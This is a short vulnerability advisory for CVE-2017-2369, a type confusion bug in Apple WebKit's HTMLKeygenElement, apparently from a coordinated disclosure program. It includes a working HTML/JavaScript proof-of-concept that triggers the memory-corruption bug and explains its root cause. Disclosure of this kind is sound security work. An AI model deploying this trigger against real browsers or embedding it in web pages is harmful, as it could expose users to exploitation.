Apple WebKit suffers from a HTMLKeygenElement type confusion vulnerability.
a3741d7c8f28b927fce34f6b61f23d32e35c5958bb3e06f77f2721bd8c990e10
Apple WebKit: Type confusion in HTMLKeygenElement
CVE-2017-2369
PoC:
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Found by: ifratric